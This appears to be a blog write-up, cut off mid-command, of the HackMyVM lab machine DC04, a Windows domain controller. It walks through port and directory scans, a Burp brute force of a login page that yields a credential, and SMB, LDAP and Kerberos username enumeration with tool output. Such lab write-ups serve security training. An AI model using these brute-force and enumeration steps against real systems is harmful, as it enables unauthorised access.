{"id":867,"date":"2025-06-13T17:59:11","date_gmt":"2025-06-13T09:59:11","guid":{"rendered":"http:\/\/162.14.82.114\/?p=867"},"modified":"2025-06-13T17:59:11","modified_gmt":"2025-06-13T09:59:11","slug":"hmv-_-dc04","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/867\/06\/13\/2025\/","title":{"rendered":"hmv[-_-]DC04"},"content":{"rendered":"<h1>DC04<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757864.png\" alt=\"image-20250610235313724\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757866.png\" alt=\"image-20250613122404573\" \/><\/p>\n
<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.103:53\nOpen 192.168.10.103:80\nOpen 192.168.10.103:88\nOpen 192.168.10.103:135\nOpen 192.168.10.103:139\nOpen 192.168.10.103:389\nOpen 192.168.10.103:445\nOpen 192.168.10.103:464\nOpen 192.168.10.103:593\nOpen 192.168.10.103:636\nOpen 192.168.10.103:3268\nOpen 192.168.10.103:3269\nOpen 192.168.10.103:5985\nOpen 192.168.10.103:9389\nOpen 192.168.10.103:49664\nOpen 192.168.10.103:49669\nOpen 192.168.10.103:49670\nOpen 192.168.10.103:49679\nOpen 192.168.10.103:49721\n\nPORT      STATE SERVICE       REASON          VERSION\n53\/tcp    open  domain        syn-ack ttl 128 Simple DNS Plus\n80\/tcp    open  http          syn-ack ttl 128 Apache httpd 2.4.58 ((Win64) OpenSSL\/3.1.3 PHP\/8.2.12)\n|_http-title: Did not follow redirect to http:\/\/soupedecode.local\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n88\/tcp    open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-13 20:28:35Z)\n135\/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds? syn-ack ttl 128\n464\/tcp   open  kpasswd5?     
syn-ack ttl 128\n593\/tcp   open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped    syn-ack ttl 128\n3268\/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n3269\/tcp  open  tcpwrapped    syn-ack ttl 128\n5985\/tcp  open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing\n49664\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49669\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49670\/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n49679\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49721\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:12:E9:22 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 56573\/tcp): CLEAN (Timeout)\n|   Check 2 (port 63368\/tcp): CLEAN (Timeout)\n|   Check 3 (port 11187\/udp): CLEAN (Timeout)\n|   Check 4 (port 53121\/udp): CLEAN (Timeout)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 16h00m01s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| nbstat: NetBIOS name: DC01, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:12:e9:22 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   SOUPEDECODE&lt;1c&gt;      Flags: &lt;group&gt;&lt;active&gt;\n|   SOUPEDECODE&lt;00&gt;      Flags: &lt;group&gt;&lt;active&gt;\n|   DC01&lt;00&gt;             Flags: &lt;unique&gt;&lt;active&gt;\n|   DC01&lt;20&gt;             Flags: &lt;unique&gt;&lt;active&gt;\n|   SOUPEDECODE&lt;1b&gt;      
Flags: &lt;unique&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:12:e9:22:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n|   date: 2025-06-13T20:29:24\n|_  start_date: N\/A<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2&gt;\/dev\/null\n\n403      GET        9l       30w      305c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        9l       33w      302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302      GET        0l        0w        0c http:\/\/192.168.10.103\/ =&gt; http:\/\/soupedecode.local\n302      GET        0l        0w        0c http:\/\/192.168.10.103\/index.php =&gt; http:\/\/soupedecode.local\n302      GET        0l        0w        0c http:\/\/192.168.10.103\/Index.php =&gt; http:\/\/soupedecode.local\n503      GET       11l       44w      405c http:\/\/192.168.10.103\/examples\n301      GET        9l       30w      350c http:\/\/192.168.10.103\/licenses =&gt; http:\/\/192.168.10.103:8080\/licenses\/\n302      GET        0l        0w        0c http:\/\/192.168.10.103\/INDEX.php =&gt; http:\/\/soupedecode.local\n[#&gt;------------------] - 2m     73410\/882188  15m     found:6       errors:44     \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_192_168_10_103_-1749788849.state ...\n[#&gt;------------------] - 2m     73434\/882188  15m     found:6       errors:44     \n[#&gt;------------------] - 2m     73396\/882184  696\/s   http:\/\/192.168.10.103\/<\/code><\/pre>\n<p>Add a hosts entry so the domain name resolves:<\/p>\n<pre><code class=\"language-bash\">192.168.10.103   
soupedecode.local<\/code><\/pre>\n<p>Scan again:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ feroxbuster -u http:\/\/soupedecode.local\/  -x html txt php 2&gt;\/dev\/null \n\n403      GET        9l       30w      308c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        9l       33w      305c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302      GET        0l        0w        0c http:\/\/soupedecode.local\/ =&gt; http:\/\/soupedecode.local\n302      GET        0l        0w        0c http:\/\/soupedecode.local\/index.php =&gt; http:\/\/soupedecode.local\n503      GET       11l       44w      408c http:\/\/soupedecode.local\/examples\n301      GET        9l       30w      356c http:\/\/soupedecode.local\/licenses =&gt; http:\/\/soupedecode.local:8080\/licenses\/\n200      GET      610l     1250w    38994c http:\/\/soupedecode.local\/server-status\n302      GET        0l        0w        0c http:\/\/soupedecode.local\/Index.php =&gt; http:\/\/soupedecode.local\n200      GET     1169l     7264w   102074c http:\/\/soupedecode.local\/server-info\n[####################] - 2m    120060\/120060  0s      found:7       errors:0      \n[####################] - 2m    120000\/120000  1097\/s  http:\/\/soupedecode.local\/<\/code><\/pre>\n
<h2>Vulnerability Discovery<\/h2>\n<h3>Sensitive Directories<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757867.png\" alt=\"image-20250613123713021\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757868.png\" alt=\"image-20250613123825455\" \/><\/p>\n<p>A new hostname turned up; add it as well:<\/p>\n<pre><code class=\"language-bash\">192.168.10.103   heartbeat.soupedecode.local<\/code><\/pre>\n
<h3>Brute-forcing the Login Page<\/h3>\n<p>There is a login page; try logging in:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757869.png\" alt=\"image-20250613130840766\" \/><\/p>\n<p>First capture a request and see whether there is anything more to it:<\/p>\n<pre><code class=\"language-bash\">POST \/login.php HTTP\/1.1\nHost: heartbeat.soupedecode.local\nContent-Length: 32\nCache-Control: max-age=0\nAccept-Language: en-US,en;q=0.9\nOrigin: http:\/\/heartbeat.soupedecode.local\nContent-Type: application\/x-www-form-urlencoded\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/136.0.0.0 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/heartbeat.soupedecode.local\/login.php\nAccept-Encoding: gzip, deflate, br\nCookie: PHPSESSID=5d46ucrej014bk99jhriirrfa2\nConnection: keep-alive\n\nusername=admin&amp;password=password<\/code><\/pre>\n<p>Tried SQL injection, but it failed... The only option left is brute force... It turned out the responses were abnormal, meaning they came back without any error message...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757870.png\" alt=\"image-20250613140023354\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757871.png\" alt=\"image-20250613140230947\" \/><\/p>\n
<p>Getting <code>403<\/code> constantly is bad news... Rebooting the target did not help; the only fix was to re-import it, and this time take a snapshot. The Windows boxes from this author are all prone to strange problems, which shows how temperamental Windows targets are...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757872.png\" alt=\"image-20250613142211313\" \/><\/p>\n<p>The second option is greyed out for me because I already took a snapshot; normally it can be selected. Then remember to update the <code>dns<\/code> entry:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757873.png\" alt=\"image-20250613144609799\" \/><\/p>\n<p>A wrong password produces <code>Invalid username or password.<\/code>; try brute-forcing:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757874.png\" alt=\"image-20250613144746197\" \/><\/p>\n<p>That is the way!!! I do not know much, so I just used the free Burp edition in Kali, which brute-forces very slowly; the Pro edition on the host machine would be much faster. If the target hangs, restore the snapshot and continue brute-forcing:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757875.png\" alt=\"image-20250613150516034\" \/><\/p>\n<p>Take a look at the response:<\/p>\n<pre><code class=\"language-bash\">HTTP\/1.1 200 OK\nDate: Fri, 13 Jun 2025 23:04:23 GMT\nServer: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\nX-Powered-By: PHP\/8.2.12\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nSet-Cookie: user=admin; expires=Sat, 14 Jun 2025 00:04:23 GMT; Max-Age=3600; path=\/\nRefresh: 0; url=app.php\nContent-Length: 
1913\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\/html; charset=UTF-8\n\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Login&lt;\/title&gt;\n    &lt;style&gt;\n        body {\n            font-family: Arial, sans-serif;\n            background-color: #f9f9f9;\n            display: flex;\n            justify-content: center;\n            align-items: center;\n            height: 100vh;\n            margin: 0;\n        }\n        .container {\n            background-color: #fff;\n            padding: 20px;\n            border-radius: 8px;\n            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);\n            width: 300px;\n            text-align: center;\n        }\n        input[type=&quot;text&quot;], input[type=&quot;password&quot;], input[type=&quot;submit&quot;] {\n            padding: 10px;\n            margin: 10px 0;\n            border: 1px solid #ccc;\n            border-radius: 4px;\n            width: 100%;\n        }\n        input[type=&quot;submit&quot;] {\n            background-color: #007bff;\n            color: #fff;\n            cursor: pointer;\n        }\n        input[type=&quot;submit&quot;]:hover {\n            background-color: #0056b3;\n        }\n        .message {\n            padding: 10px;\n            margin-top: 10px;\n            border-radius: 4px;\n        }\n        .success {\n            background-color: #d4edda;\n            color: #155724;\n        }\n        .error {\n            background-color: #f8d7da;\n            color: #721c24;\n        }\n    &lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n\n&lt;div class=&quot;container&quot;&gt;\n    &lt;h2&gt;Login&lt;\/h2&gt;\n    &lt;form method=&quot;post&quot; action=&quot;&quot;&gt;\n        &lt;input type=&quot;text&quot; name=&quot;username&quot; 
placeholder=&quot;Username&quot; required&gt;\n        &lt;input type=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;Password&quot; required&gt;\n        &lt;input type=&quot;submit&quot; value=&quot;Login&quot;&gt;\n    &lt;\/form&gt;\n\n    &lt;p class=&quot;message success&quot;&gt;Login successful! Redirecting...&lt;\/p&gt;&lt;\/div&gt;\n\n&lt;\/body&gt;\n&lt;\/html&gt;\n<\/code><\/pre>\n<p>The brute force clearly succeeded! This yields one credential: <code>admin:nimda<\/code><\/p>\n<h3>Information Gathering on Sensitive Ports<\/h3>\n<h4>SMB Service<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ enum4linux -a $IP                                        \nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Fri Jun 13 03:06:42 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: SOUPEDECODE\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n        DC01            &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        SOUPEDECODE     &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n        SOUPEDECODE     &lt;1c&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain Controllers\n        DC01            &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n        SOUPEDECODE     &lt;1b&gt; -         B &lt;ACTIVE&gt;  Domain Master Browser\n\n        MAC Address = 08-00-27-66-BA-0F\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[E] Server doesn&#039;t allow session using username &#039;&#039;, password &#039;&#039;.  
Aborting remainder of tests.<\/code><\/pre>\n<h4>LDAP<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nmap -n -sV --script &quot;ldap* and not brute&quot; $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-13 03:07 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00092s latency).\nNot shown: 987 filtered tcp ports (no-response)\nPORT     STATE SERVICE       VERSION\n53\/tcp   open  domain        Simple DNS Plus\n80\/tcp   open  http          Apache httpd 2.4.58 ((Win64) OpenSSL\/3.1.3 PHP\/8.2.12)\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\n88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-13 23:07:23Z)\n135\/tcp  open  msrpc         Microsoft Windows RPC\n139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   &lt;ROOT&gt;\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|      
 supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 
1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 77859\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250613230723.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n445\/tcp  open  microsoft-ds?\n464\/tcp  
open  kpasswd5?\n593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   &lt;ROOT&gt;\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|       supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 
1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 
1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 77859\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250613230723.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n3269\/tcp open  tcpwrapped\n5985\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nMAC Address: 08:00:27:66:BA:0F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.65 seconds<\/code><\/pre>\n<h4>Brute-forcing usernames against the Kerberos service<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ ..\/DC02\/kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc $IP \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt\n\n    __             __               __     \n   \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,&lt; \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/                                        \n\nVersion: v1.0.3 (9dad6e1) - 06\/13\/25 - Ronnie Flathers @ropnop\n\n2025\/06\/13 03:11:28 &gt;  Using KDC(s):\n2025\/06\/13 03:11:28 &gt;   192.168.10.101:88\n\n2025\/06\/13 03:11:29 &gt;  [+] VALID USERNAME:       administrator@SOUPEDECODE.LOCAL\n2025\/06\/13 03:11:34 &gt;  [+] VALID USERNAME:       Administrator@SOUPEDECODE.LOCAL\n^C<\/code><\/pre>\n<p>Nothing else turns up, so there is no point forcing it...<\/p>\n<h4>UDP information gathering<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo nmap 